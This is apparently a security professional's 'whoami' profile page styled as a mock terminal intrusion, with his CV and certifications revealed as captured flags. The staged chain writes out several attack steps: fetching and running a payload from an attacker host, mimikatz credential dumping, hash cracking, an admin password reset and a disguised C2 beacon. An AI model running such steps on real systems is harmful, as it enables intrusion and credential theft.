WHOAMI

System is starting up! Loading up things...
###### LOADING! ####### CPU warm-up.......[ OK ] GPU warm-up.......[ OK ] Int. RAM..........[ OK ] Int. HD0001.......[ OK ] Int. HD0002.......[ OK ] Int. LUN00014.....[ OK ] Int. LUN00015.....[ OK ] Int. settings.....[ OK ] Connecting TOR....[ OK ] Proxy chains......[ OK ] Secret stuff......[ OK ] Loading GUI.......[ OK ] Loading AI........[ OK ]
Randomizing.......[ OK ] Completing........[ OK ]
##### COMPLETED! ##### ┌──(kali㉿kali)-[~] whoami kali └─$ hostname h4x └─$ uptime 00:01:09 └─$ pwd /home/kali └─$ cd /home/Henrik Parkkinen └─$ su Henrik Parkkinen Password: └─$ whoami Henrik Parkkinen
└─$ └─$ └─$ └─$ nmap -sV [REDACTED]
[+] Enumerating services... 22/tcp open ssh 53/tcp dns 53/upd dns 80/tcp open nginx 443/tcp open cloudflare 1337/tcp open Service 8080/tcp open cloudflare └─$ └─$ └─$ └─$ gobuster dir -u https[:]//[REDACTED] /admin /api/v1 /dev /login /signup /1337 /cat_pictures /config └─$ └─$ └─$ └─$ sqlmap -u [REDACTED]/1337?id=1 [CRITICAL] injectable parameter found

└─$ └─$ └─$ └─$ whoami 2>/dev/null > 3v1lrpc.txt └─$ gcc 3v1lrpc.txt -o 3v1lrpc.exe └─$ python3 -m http.server 443 └─$ nc [TARGET IP] 1337 └─$ 3vil$h3ll:> Connected to target machine! #CONNECTION #TO #EVIL #AND #SNEAKY #BACKDOOR #SUCCESSFULLY #ESTABLISHED!

##### ACCESS GRANTED ##### └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> /bin/bash -i └─$ 3vil$h3ll:> whoami NT/Guest └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> wget https[:]//h4x/3v1lrpc.exe └─$ 3vil$h3ll:> chmod +x 3v1lrpc.exe └─$ 3vil$h3ll:> ./3v1lrpc.exe ################################## ###########3v1lrpc.exe############ ################################## [loading*] 3v1lrpc.exe ... [loading completed*] Set Options: rports: [*] rhosts: [*] payload: [*] lhost: [127.0.0.1] aux: [nc] eternal blue: [True] Run exploit: Y [processing*] [payload initiated*] [exploit checking*] [exploit running*] ----------------------------------- [PAYLOAD BUFFER] ----------------------------------- <<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>> .....-=$[HACKING ONGOING]$=-..... WARNING! APESHIT UNLEASHED ON ALL PORTS [RPC Exploitations Ongoing*] ...Time to drink coffee... ...Guessing random ports... ...Shooting 3v1l payloads... ...#65355 is the answer... ...GL HF GG... ...3v1l sh1t... ...<VOID>... <<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>> ----------------------------------- [/PAYLOAD BUFFER] ----------------------------------- [exploit*] 100% completed! [exploit*] successful! [hidden flag found*] e1Nob3cgSGVucmlrIFBhcmtraW5lbidzIGZ1bGwgcHJvZmlsZSBieSBleGVjdXRpbmcgbmV0IHVzZXIgSGVucmlrIFBhcmtraW5lbiAvYWxsIGluIGNtZH0= ################################## ###########3v1lrpc.exe############ ################################## └─$ 3vil$h3ll:> base64 -d flag.txt [REDACTED] └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> └─$ 3vil$h3ll:> shell └─$ C:\Windows\System32> whoami NT/Henrik Parkkinen └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> net user Henrik Parkkinen #PROFILE Name: Henrik Parkkinen Entity: www[.]HenrikParkkinen[.]com Country: Sweden Location: Remote [From Planet Earth] Language: Swedish, English & Finish Experience: +20 years Role: ZybR C:qr1ty g33k Title: <VOID> Understands: Digital ecosystem, Emerging technologies, Business Management, Cyber attack & threat landscape, Offensive Security, Defensive Security, Infrastructure, Enterprise & Security Architecture Background: Offensive, Defensive, Technical, Hands-on, Management, Leadership, Security Architecture Strengths: Analytical, Strategic thinking, Team-player, Leader Communication: All levels. Technical SME's to C-level, Boards & Executives Presentations skills: Strong, both visual and verbal Mindset: Pragmatic, Progressive, Self-reflecting & gets sh*t done Attitude: Positive, Calm & Authentic H4xing: Kali Linux, Impacket, nxc, Metasploit, msfvenom, Armitage, Cobalt Strike, Sliver, Nessus, Hydra, John, Hashcat, gobuster, dirbuster, ssh, ligolo-ng, Burp, ZAP, smbclient, WireShark, NMAP, rustscan, dig, OSINT, PowerView, Bloodhound, nc, Mimikatz, SQLMAP, Notepad └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> cd\ └─$ C:\> dir /s "userflag.txt" Volume in drive C is Local Disk Volume Serial Number is xxxx-yyyy Directory of C:\Users\Henrik Parkkinen\Desktop xxxx-yy-zz 02:49 userflag.txt 1 File(s) 90 bytes └─$ C:\> └─$ C:\> └─$ C:\> └─$ C:\> cd C:\Users\Henrik Parkkinen\Desktop └─$ C:\Users\Henrik Parkkinen\Desktop> more userflag.txt #KNOWLEDGE, EXPERIENCE & EDUCATION [VERBOSE MODE] #Certifications & Certificates CISM - ISACA CISA - ISACA CRISC - ISACA CGEIT- ISACA COBIT - ISACA CCSK - CSA eJPT - eLearnSecurity MCP - MSFT PNPT - TCM Security CRTO - ZPS C-ADPenX - The SecOps Group CRTeamer - The SecOps Group CNPEN - The SecOps Group CRTA - CWL MCRTA - CWL AD-RTS - CWL ISO27K LA - MA
[OBSOLETE] MCITP: Ent Admin - MSFT MCTS - MSFT MCSE: SEC - MSFT MCSA: SEC - MSFT MCSE - MSFT MCSA - MSFT #Frameworks & Standards NIST CSF
COBIT CCM CSA ISO 27001 CIS CSC ITIL MITRE ATT&CK #Cyber & Info Sec skills Sec Assessments Sec Auditing Governance Cloud Sec Risk Mgmt Strategy Mgmt Consulting Threat Modelling Sec Architecture 3rd & Supply Chain Sec #Assignments & Exp. Officer Advisor Architect Strategist Specialist <Prefix> Leader <Prefix> Manager #EDUCATION The State UNV of New York International cyber conflicts Delft UNV of Technology Cyber security economics UNV of Washington Info sec & risk mgmt context Building an info sec risk mgmt toolkit Designing & executing info sec starts Higher Vocational IT Education Infra, NW, FW, & IT-sec +multiple vendor courses& lectures #Leadership & Mgmt EDU Individual Leadership Dev & Growth Leading Leaders Self-leadership LMI International Building & Leading Teams Personal Leadership Schinkler Management Building The Winning Team Focus Consulting Leadership & Business Mgmt Vendita Effective Communication #Volunteering & Accomplishments ISACA – SME Review: CRISC RM 7^th ISACA – SME Review: DTEF

#Recognitions
Top 9 in Cybersecurity strategy & leadership – 2025 Top 12 GRC Leaders – 2025 Top 20 Cybersecurity Influencers – 2025 Top 25 CISOs – 2025 Top 50 Cybersecurity Influencers & Experts – 2025 Top 50 Thought Leader in GRC – 2025 Top 100 Thought Leader in Cybersecurity – 2025 Top 10 Cybersecurity Leaders in EMEA – 2024 Top 50 CISOs & Cybersecurity Leaders – 2024 Top 16 Cybersecurity influencers in the industry – 2024 TOP 25 Influential CISOs & Cybersecurity Leaders 2024 TOP 50 CISOs & Cybersecurity Leaders 2024 Global 40 under 40 in Cybersecurity 2023
#Fun THM – Top 1% [Global], Top 30 [Sweden] ((in the past) what ever this means)) #Epilogue Stay Curious. Hack Stuff. Be Creative. Laugh. Improve. Resilience. Together. Protect. Be Cool. Relax. Share Knowledge. Wisdom. G33k. Inspire Others. Authenticity. Think. Positive Mindset. 1337. Chill. Good Vibes. Security. Recon. whoami. Learn. Contemplate. Be Kind. └─$ C:\Users\Henrik Parkkinen\Desktop> cd\ └─$ C:\> └─$ C:\> └─$ C:\> └─$ C:\> echo coffee break. brb coffee break. brb └─$ C:\> └─$ C:\> └─$ C:\> └─$ C:\> dir /s "rootflag.txt" Volume in drive C is Local Disk Volume Serial Number is xxxx-yyyy Directory of C:\Users\Administrator xxx-yy-zz 04:15 rootflag.txt 1 File(s) 12 bytes └─$ C:\> cd C:\Users\Administrator └─$ C:\Users\Administrator> more rootflag.txt Access Denied └─$ C:\Users\Administrator> cd C:\Temp └─$ C:\Temp> └─$ C:\Temp> └─$ C:\Temp> └─$ C:\Temp> wget https://h4x/mimikatz.exe └─$ C:\Temp> mimikatz.exe .#####. mimikatz, "Kiwi" .## ^ ##. ## / \ ## /* * * ## \ / ## [REDACTED INFO] '## v ##' [REDACTED WEBSITE] '#####' mimikatz # privilege::debug Privilege '20' OK mimikatz # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM mimikatz # lsadump::sam Domain: [REDACTED] SysKey: [REDACTED] Local SID: [REDACTED] SAMKey: [REDACTED] RID: [REDACTED] User: Administrator Hash NTLM: [REDACTED] └─$ C:\Temp> └─$ C:\Temp> └─$ C:\Temp> └─$ C:\Temp> background └─$ 3vil$h3ll:> john -w=rockyou.txt hash.txt Done! The Password is: [REDACTED] └─$ 3vil$h3ll:> shell └─$ C:\Windows\System32> whoami NT/Henrik Parkkinen └─$ C:\Windows\System32> cd\ └─$ C:\> └─$ C:\> └─$ C:\> └─$ C:\> net user administrator [REDACTED] The command completed successfully └─$ C:\> whoami NT/Administrator └─$ C:\> cd C:\Users\Administrator └─$ C:\Users\Administrator> more rootflag.txt
----------[Hidden Message: Start]---------- #Top secret message VGFhYWFhIGRhYWFhYWFhISBZb3UgZm91bmQgbWUgYW5kIG1hbmFnZWQgdG8gZGVjaXBoZXIgbWUuLi5idXQgdGhpcyBpcyBqdXN0IGEgdXNlbGVzcyBjaHVuayBvZiB0ZXh0Li4uYW5kIHRoZXJlIGFyZSBubyBzZWNyZXRzIGhlcmUgKGFzIHlvdSBtYXkgaGF2ZSBmb3VuZCBvdXQgbm934oCmb3IgZXZlbiBwcmlvciB0byB0aGlzIGRlY2lwaGVyaW5nKS4gSWYgeW91IGxpa2UgdGhlIGNvbnRlbnQgSSBwcm9kdWNlLCBmaW5kIGl0IGludGVyZXN0aW5nIGFuZCB0aGluayBpdCBtYXkgYmUgb2YgaW50ZXJlc3QgdG8gb3RoZXJzIEkgd2VsY29tZSB5b3UgdG8gc2hhcmUgYW5kIHNwcmVhZCB0aGUgd29yZCA9KSBBbHNvIGtlZXAgaW4gbWluZCB0aGF0IHRoaXMgbWVzc2FnZSBtYXkgY2hhbmdlIGluIHRoZSBmdXR1cmUsIG5leHQgdGltZSBJIG1pZ2h0IHdyaXRlIHNvbWV0aGluZyBlbHNlICh0aGF0IGlzIHVzZWxlc3Mgb3IgdGVsbCBhIGJhZCBqb2tlIG9yIHN0dWZmIGxpa2UgdGhhdCB3aGljaCBpcyBvbmx5IGZvdW5kIGF0IHRoaXMgcGFydCBvZiB0aGUgcGFnZSkuIE9rLCB0aGF0IHdpbGwgYmUgYWxsIGZvciBub3cuIEJ1dCB3ZSB3aWxsIHNlZSBlYWNoIG90aGVyIGFnYWluIEkgZ3Vlc3MoPykgCi8vSGVucmlrIFBhcmtraW5lbgo= ----------[Hidden Message: End]----------
└─$ C:\> └─$ C:\> └─$ C:\> └─$ C:\>cd C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> upload ms_updater.exe └─$ C:\Windows\System32> ./ms_updater.exe └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> └─$ C:\Windows\System32> exit └─$ 3vil$h3ll:> exit └─$ └─$ └─$ └─$ sudo ./NinjaGhostC2 --profile sneaky --transport dns--sleep 45
=============================== <<<<<:[COMMAND & CONTROL]:>>>>> ===============================
-^^--^^--^^--^^--^^--^^--^^- ............................ ............................ .........../\_/\...Meeow!... ..........( o.o )........... ...........> ^ <............ ....||=============||....... ....||----Ninja----||....... ....||---GhostC2---||....... ....||=============||....... ............................ ............................ =============================== <<<<<<:[SNEAKY AS A CAT]:>>>>>> =============================== =============================== ....FRAMEWORK INITIALIZATION... =============================== [>] Loading runtime modules… [>] Initializing operator console… [>] Verifying encrypted transport… [>] Loading malleable profiles… [>] Obfuscating syscall layer… [>] Patching AMSI interfaces… [>] Disabling ETW telemetry… [>] Building reflective payloads… [>] Registering HTTPS listener… [>] Generating session keys… [>] Syncing redirector nodes… [>] Establishing C2 channels… [>] Loading pivot manager… [>] Starting SOCKS relay subsystem… [>] Enabling beacon jitter… [>] Validating OPSEC configuration… [>] Starting task scheduler… [>] Deploying sleep masks… [>] Finalizing framework startup… [>] Waiting for beacon callbacks… =============================== .....TEAMSERVER CONNECTION..... =============================== [*] Connecting to teamserver… [*] Authenticated operator: armitage [*] Listener started: dns [*] Beacon check-ins enabled =============================== .........OPSEC SETTINGS........ =============================== [OPSEC] Malleable profile applied [OPSEC] In-memory loader encrypted [OPSEC] Sleep interval randomized [OPSEC] Defender exclusions verified [OPSEC] API hooks resolve [OPSEC] Memory signatures masked [OPSEC] RWX memory regions sanitize [OPSEC] Userland hooks bypassed [OPSEC] Syscall stubs refreshed [OPSEC] Named pipe transport enabled [OPSEC] EDR heuristics evaded [OPSEC] CLR execution isolated [OPSEC] Thread stack spoofed [OPSEC] Beacon entropy increased [OPSEC] Indirect syscalls enabled =============================== ........ACTIVE BEACONS......... =============================== [+] SYSTEM integrity beacon checked in teamserver> info [*] Host: [REDACTED] [*] User: NT AUTHORITY\SYSTEM [*] Token: System [*] Integrity: High [*] IP: [REDACTED] [*] PID: 31337 [*] OS: Windows 2026 Server Enterprise [*] Transport: DNS [*] Beacon: ms_updater.exe [*] Beacon size: 212 kb [*] Location: C:\Windows\System32 [*] Session: 0 [*] Arch: x64 [*] Kill Date: N/A [*] Pivoting: Enabled [*] SOCKS5: Active (127.0.0.1:1080) [*] Sleep: 141s (Jitter: 28%) [*] Last check-in: 00s ago [*] Listener: dns
[*] up time: 56s teamserver> background └─$ └─$ └─$ └─$ clear └─$ └─$ └─$ └─$ exit └─$ shutdown now The system is shutting down NOW! Broadcast message from: Henrik Parkkinen Message: Follow the white rabbit... Purging history cache....[ OK ] Deleting temp things.....[ OK ] Doing funky stuff =).....[ OK ] LUN00014 unmount.........[ OK ] LUN00015 unmount.........[ OK ] Purging virtual memory...[ OK ] Recycling something......[ OK ] Stopping http server.....[ OK ] Stopping all services....[ OK ] Disconnecting TOR........[ OK ] Killing all processes....[ OK ] ==== SYSTEM POWERED OFF ====

... 72 HOURS LATER

System is starting up! Loading up things...
###### LOADING! ####### CPU warm-up.......[ OK ] GPU warm-up.......[ OK ] Int. RAM..........[ OK ] Int. HD0001.......[ OK ] Int. HD0002.......[ OK ] Int. LUN00014.....[ OK ] Int. LUN00015.....[ OK ] Int. settings.....[ OK ] Connecting TOR....[ OK ] Proxy chains......[ OK ] Secret stuff......[ OK ] Loading GUI.......[ OK ] Loading AI........[ OK ]
Randomizing.......[ OK ] Completing........[ OK ]
##### COMPLETED! #####

└─$ └─$ └─$ └─$ sudo ./NinjaGhostC2 --profile sneaky --transport dns--sleep 45
=============================== <<<<<:[COMMAND & CONTROL]:>>>>> ===============================
-^^--^^--^^--^^--^^--^^--^^- ............................ ............................ .........../\_/\...Meeow!... ..........( o.o )........... ...........> ^ <............ ....||=============||....... ....||----Ninja----||....... ....||---GhostC2---||....... ....||=============||....... ............................ ............................ =============================== <<<<<<:[SNEAKY AS A CAT]:>>>>>> =============================== =============================== ....FRAMEWORK INITIALIZATION... =============================== [>] Loading runtime modules… [>] Initializing operator console… [>] Verifying encrypted transport… [>] Loading malleable profiles… [>] Obfuscating syscall layer… [>] Patching AMSI interfaces… [>] Disabling ETW telemetry… [>] Building reflective payloads… [>] Registering HTTPS listener… [>] Generating session keys… [>] Syncing redirector nodes… [>] Establishing C2 channels… [>] Loading pivot manager… [>] Starting SOCKS relay subsystem… [>] Enabling beacon jitter… [>] Validating OPSEC configuration… [>] Starting task scheduler… [>] Deploying sleep masks… [>] Finalizing framework startup… [>] Waiting for beacon callbacks… =============================== .....TEAMSERVER CONNECTION..... =============================== [*] Connecting to teamserver… [*] Authenticated operator: armitage [*] Listener started: dns [*] Beacon check-ins enabled =============================== .........OPSEC SETTINGS........ =============================== [OPSEC] Malleable profile applied [OPSEC] In-memory loader encrypted [OPSEC] Sleep interval randomized [OPSEC] Defender exclusions verified [OPSEC] API hooks resolve [OPSEC] Memory signatures masked [OPSEC] RWX memory regions sanitize [OPSEC] Userland hooks bypassed [OPSEC] Syscall stubs refreshed [OPSEC] Named pipe transport enabled [OPSEC] EDR heuristics evaded [OPSEC] CLR execution isolated [OPSEC] Thread stack spoofed [OPSEC] Beacon entropy increased [OPSEC] Indirect syscalls enabled =============================== ........ACTIVE BEACONS......... =============================== [+] SYSTEM integrity beacon checked in ms_updater.exe @ [REDACTED]

teamserver>
teamserver>
teamserver> teamserver> info [*] Host: [REDACTED] [*] User: NT AUTHORITY\SYSTEM [*] Token: System [*] Integrity: High [*] IP: [REDACTED] [*] PID: 31337 [*] OS: Windows 2026 Server Enterprise [*] Transport: DNS [*] Beacon: ms_updater.exe [*] Beacon size: 212 kb [*] Location: C:\Windows\System32 [*] Session: 0 [*] Arch: x64 [*] Kill Date: N/A [*] Pivoting: Enabled [*] SOCKS5: Active (127.0.0.1:1080) [*] Sleep: 141s (Jitter: 28%) [*] Last check-in: 00s ago [*] Listener: dns
[*] up time: 72h & 56s teamserver> teamserver> teamserver> teamserver> jump scshell64 [REDACTED] smb [+] SYSTEM integrity beacon checked in svchost.exe @ [REDACTED] teamserver> teamserver> teamserver> teamserver> beacons ---------------------------------------- ID --- Host ---- User --- Process ---------------------------------------- 01....[XYZ].....SYSTEM...ms_updater.exe 02....[XYZ].....SYSTEM...svchost.exe [+] 2 active beacons teamserver> teamserver> teamserver> use 02 [*] Interacting with beacon 02 [*] Host [XYZ] [*] User: SYSTEM [*] Integrity: High teamserver> teamserver> teamserver> teamserver> krb_triage [*] Enumerating Kerberos tickets... [*] Extracting active logon sessions... [*] Parsing TGT/TGS cache entries...

───────────────────────── LOGON SESSION 0x0003e7 ───────────────────────── User: NT AUTHORITY\SYSTEM Domain: corp.local Logon Type: service ───────────────────────── [*] Kerberos ticket cache ─────────────────────────
User: SYSTEM$ Ticket: krbtgt/CORP.LOCAL Realm: corp.local Renewable: True Encryption: AES256 User: svc-backup Ticket: cifs/FILE01 Realm: corp.local Renewable: True Encryption: AES256 ───────────────────────── [*] Total tickets recovered: 2 [*] Ticket cache integrity: Valid

teamserver> teamserver> teamserver>